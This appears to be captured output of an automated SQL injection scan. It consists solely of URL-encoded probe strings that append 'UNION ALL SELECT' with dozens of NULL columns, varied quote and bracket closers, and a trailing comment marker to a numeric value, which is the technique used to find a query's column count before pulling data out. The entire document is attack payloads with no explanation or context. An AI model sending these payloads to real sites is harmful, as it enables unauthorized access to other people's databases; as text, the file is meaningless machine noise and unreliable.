1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 